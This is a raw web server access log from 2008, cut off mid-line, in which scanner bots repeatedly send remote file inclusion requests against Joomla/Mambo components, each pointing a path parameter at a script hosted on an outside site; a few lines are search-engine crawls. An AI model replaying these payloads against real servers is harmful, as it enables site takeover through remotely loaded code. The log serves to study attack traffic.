80.190.200.18 - - [09/Nov/2008:19:31:39 -0800] "GET /logs/access_080804.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://geocities.com/grz_57/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
80.190.200.18 - - [09/Nov/2008:19:31:39 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://geocities.com/grz_57/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
80.190.200.18 - - [09/Nov/2008:19:31:39 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://geocities.com/grz_57/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
213.165.84.215 - - [09/Nov/2008:19:32:07 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://fantalaranja.t35.com/id44.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
209.85.108.8 - - [09/Nov/2008:19:32:13 -0800] "GET /logs/access_080804.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
209.85.108.8 - - [09/Nov/2008:19:32:13 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
209.85.108.8 - - [09/Nov/2008:19:32:14 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
80.190.200.18 - - [09/Nov/2008:19:32:27 -0800] "GET /logs/access_080804.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://geocities.com/grz_57/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
80.190.200.18 - - [09/Nov/2008:19:32:27 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://geocities.com/grz_57/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
80.190.200.18 - - [09/Nov/2008:19:32:27 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://geocities.com/grz_57/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.vspeaking.com"
64.79.215.62 - - [09/Nov/2008:19:32:46 -0800] "GET /logs/scripts.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.alldogsgym.com/images/headers/ide.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:19:33:38 -0800] "GET /logs/access_080804.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:19:33:38 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:19:33:38 -0800] "GET /logs/access_080804.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:19:33:38 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:19:33:38 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
88.80.202.189 - - [09/Nov/2008:19:33:38 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.geocities.com/aank44/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
211.115.110.161 - - [09/Nov/2008:19:36:20 -0800] "GET /logs/access.log/?sourcedir=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.115.110.161 - - [09/Nov/2008:19:36:21 -0800] "GET /?sourcedir=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.vspeaking.com"
211.115.110.161 - - [09/Nov/2008:19:36:22 -0800] "GET /logs/?sourcedir=http://dwcable.co.kr/technote/board/.or/id.txt?? HTTP/1.1" 200 2225 "-" "libwww-perl/5.79" "www.vspeaking.com"
64.79.215.62 - - [09/Nov/2008:19:36:56 -0800] "GET /logs/access_080825.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.alldogsgym.com/images/headers/ide.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.vspeaking.com"
65.55.208.252 - - [09/Nov/2008:19:37:05 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
65.55.208.252 - - [09/Nov/2008:19:37:05 -0800] "GET /logs/access_080609.log HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.vspeaking.com"
213.165.84.215 - - [09/Nov/2008:19:38:46 -0800] "GET /logs/access_0